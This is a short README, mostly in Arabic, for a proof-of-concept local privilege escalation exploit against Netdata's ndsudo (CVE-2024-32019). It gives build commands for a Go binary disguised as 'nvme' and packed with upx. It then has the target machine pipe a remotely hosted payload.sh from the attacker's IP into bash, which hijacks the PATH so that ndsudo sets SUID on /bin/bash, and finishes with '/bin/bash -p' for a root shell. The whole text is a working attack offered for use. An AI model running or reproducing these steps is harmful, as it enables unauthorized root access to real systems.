
Netdata ndsudo PoC
إثبات المفهوم لـ Netdata ndsudo
قم ببناء الثنائي:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
شغل السكربت bash:
bash exploit.sh <YOUR IP>
على الجهاز الهدف، قم بتشغيل في دليل قابل للكتابة:
curl http://<YOUT IP>:8000/payload.sh | bash
سيقوم تلقائيًا بتنزيل ثنائي nvme، وتصدير المسار، وتشغيل ndsudo وإضافة SUID إلى /bin/bash.
ربما تحتاج إلى تغيير مسار ndsudo في exploit.sh
لرفع الامتيازات، قم بتشغيل:
/bin/bash -p
يعتمد الاستغلال على https://github.com/AzureADTrent/CVE-2024-32019-POC، وعند اختباره، واجهت الخطأ:
execve: Exec format error
لهذا السبب قررت إنشاء خاصتي باستخدام Go.